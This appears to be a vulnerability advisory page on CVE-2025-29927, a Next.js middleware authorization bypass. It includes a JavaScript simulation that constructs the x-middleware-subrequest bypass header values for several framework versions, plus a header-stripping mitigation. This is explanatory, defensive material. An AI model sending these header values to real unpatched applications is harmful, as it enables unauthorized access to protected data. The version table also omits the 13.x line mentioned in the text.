Authorization Bypass in Next.js Framework by Vercel
CVE-2025-29927
What is CVE-2025-29927?
CVE-2025-29927 is a critical vulnerability in Next.js, the open-source React-based framework by Vercel for building full-stack web applications. It affects Next.js 11.1.4 and later and is fixed in 12.3.5, 13.5.9, 14.2.25 and 15.2.3. The bug lets an attacker bypass authorization checks implemented in middleware. Middleware runs before a request reaches the route handler and is commonly where applications enforce authentication, authorization, redirects and security headers.
The flaw lies in the handling of the internal HTTP request header x-middleware-subrequest. Next.js adds this header to the sub-requests that middleware itself issues and uses it to stop middleware from invoking itself recursively: when the header names the running middleware, that middleware is skipped. Vulnerable versions trusted the header on external requests as well, so an attacker who sends it with the right value (the middleware's name, or in 15.x that name repeated enough times to look as if the recursion limit had been reached) causes the request to reach the route handler without the middleware ever running. Every control that exists only in middleware is then bypassed, giving unauthorized access to the resources it was meant to protect. The fix is to upgrade to a patched version; where that is not immediately possible, external requests carrying x-middleware-subrequest should be dropped, or have the header stripped, at the proxy or CDN before they reach the application. Because middleware is so often the sole authorization layer in Next.js applications, organizations running vulnerable versions face unauthorized data disclosure, with the financial and reputational damage that follows.
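The following is an added example, not Next.js source code and not part of this page's original content. It models the middleware-skip logic that CVE-2025-29927 abused (a pre-15 guard that skips middleware when its name appears in the header, and a 15.x guard that skips once the name appears a fixed number of times), the header value an attacker sends for each, and the edge-side mitigation of stripping the header. The middleware name, routes, cookie values and the MAX_RECURSION_DEPTH constant are assumptions drawn from public write-ups of the bug; real deployments used names such as middleware or src/middleware depending on the version and project layout.

```javascript
// Added example, not Next.js source code. It models the middleware-skip logic
// that CVE-2025-29927 abused, the header an attacker sends, and the edge-side
// mitigation of stripping that header. Middleware name, routes, cookie values
// and the MAX_RECURSION_DEPTH constant are assumptions based on public write-ups.

const HEADER = 'x-middleware-subrequest';
const MAX_RECURSION_DEPTH = 5; // assumed value of the 15.x recursion guard

// A typical auth middleware: everything under /admin requires a session cookie.
// Returning null plays the role of NextResponse.next().
function authMiddleware(req) {
  if (req.path.startsWith('/admin') && req.cookies.session !== 'valid-session') {
    return { status: 401, body: 'unauthorized' };
  }
  return null;
}

// Model of the framework's middleware runner. `generation` picks the guard:
//   'pre15'  skip the middleware if its name appears in the header at all
//   '15'     skip it once the name appears MAX_RECURSION_DEPTH or more times
// In both cases the value comes straight from the client, which is the bug.
function runMiddleware(req, { middlewareName = 'middleware', generation = 'pre15' } = {}) {
  const raw = req.headers[HEADER];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  const depth = subrequests.filter((name) => name === middlewareName).length;
  const skip = generation === '15' ? depth >= MAX_RECURSION_DEPTH : depth >= 1;
  if (skip) {
    return { status: 200, body: 'route handler ran; middleware was skipped' };
  }
  const blocked = authMiddleware(req);
  return blocked ?? { status: 200, body: 'route handler ran' };
}

// Header value an attacker sends for each generation.
function bypassHeaderValue(middlewareName, generation) {
  return generation === '15'
    ? Array(MAX_RECURSION_DEPTH).fill(middlewareName).join(':')
    : middlewareName;
}

// Mitigation when upgrading is not immediately possible: drop the header from
// every external request at the proxy or CDN, so only the framework's own
// internal sub-requests can ever carry it. Header names are matched
// case-insensitively because clients may send any casing.
function stripSubrequestHeader(req) {
  const headers = {};
  for (const [name, value] of Object.entries(req.headers)) {
    if (name.toLowerCase() !== HEADER) headers[name] = value;
  }
  return { ...req, headers };
}

function makeRequest(path, headers = {}, cookies = {}) {
  return { path, headers, cookies };
}

// Walk through the scenarios and return the status each one produced.
function demo() {
  const out = {};
  const anon = makeRequest('/admin/users');
  out.noHeader = runMiddleware(anon).status;

  const pre15 = makeRequest('/admin/users', { [HEADER]: bypassHeaderValue('middleware', 'pre15') });
  out.pre15Bypass = runMiddleware(pre15, { generation: 'pre15' }).status;

  // The pre-15 payload alone is not enough against the 15.x depth check...
  out.v15SingleName = runMiddleware(pre15, { generation: '15' }).status;
  // ...but repeating the name up to the depth limit is.
  const v15 = makeRequest('/admin/users', { [HEADER]: bypassHeaderValue('middleware', '15') });
  out.v15Bypass = runMiddleware(v15, { generation: '15' }).status;

  // With the header stripped at the edge, the same requests are blocked again.
  out.strippedPre15 = runMiddleware(stripSubrequestHeader(pre15), { generation: 'pre15' }).status;
  out.strippedV15 = runMiddleware(stripSubrequestHeader(v15), { generation: '15' }).status;

  // A real session still passes, so the mitigation does not break normal use.
  const user = makeRequest('/admin/users', {}, { session: 'valid-session' });
  out.legitimate = runMiddleware(stripSubrequestHeader(user)).status;
  return out;
}

console.log(demo());
```

Run with `node` to see each scenario's status. In production the equivalent of stripSubrequestHeader is a rule on the reverse proxy; with nginx, for example, `proxy_set_header x-middleware-subrequest "";` removes the header before the request is forwarded, because nginx does not pass header fields whose value is empty. Stripping is a stopgap: the real fix remains upgrading to a patched release, since the header is only one way the framework's internal trust boundary could be crossed.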
Potential impact of CVE-2025-29927
- Unauthorized access: an attacker who skips the middleware reaches routes that the middleware alone was protecting and can view, modify or exfiltrate the data behind them, which is a data breach in any application that relied on middleware for access control.
- Application integrity: with the authorization check gone, the attacker can perform actions reserved for authenticated or privileged users, such as altering other users' data, disrupting functionality, or submitting malicious content through interfaces that should have been locked down.
- Denial of service through cache poisoning: middleware that performs rewrites or redirects is skipped as well, so the application can generate a response for a path it would normally never serve directly. If a CDN or cache stores that response, legitimate users receive the wrong content until the entry expires, which can make a critical service effectively unavailable and erode user trust.
Affected Version(s)
Product    Affected versions       Unaffected versions
next.js    >= 11.1.4, < 12.3.5     < 11.1.4, 12.3.5
next.js    >= 14.0.0, < 14.2.25    < 14.0.0, 14.2.25
next.js    >= 15.0.0, < 15.2.3     < 15.0.0, 15.2.3
Exploit Proof of Concept (PoC)
PoC code is written by security researchers to demonstrate that the vulnerability can be exploited. It is also a key building block for weaponization, which can end in ransomware deployment.
News Articles
H-ISAC TLP White Threat Bulletin: Critical Authorization Bypass Vulnerability Announced For Next.js Middleware (CVE-2025-29927) | AHA
On March 23, 2025, a critical vulnerability in Next.js middleware was disclosed and tracked as CVE-2025-29927.

Next.js Middleware Flaw Lets Attackers Bypass Authorization
A critical vulnerability in Next.js middleware allows attackers unauthorized access and control, impacting all versions of the framework.

CrushFTP Warns of HTTPS Port Vulnerability Enabling Unauthorized Access
Both CrushFTP, a popular file transfer technology, and Next.js have come under scrutiny due to significant vulnerabilities.
References
EPSS Score
93% chance of being exploited in the next 30 days.
CVSS V3.1
Timeline
- 📰 First article discovered by The Hacker News
- 🟡 Public PoC available
- 👾 Exploit known to exist
- 🥇 Vulnerability reached the number 1 worldwide trending spot
- 📈 Vulnerability started trending
- Vulnerability published
- Vulnerability reserved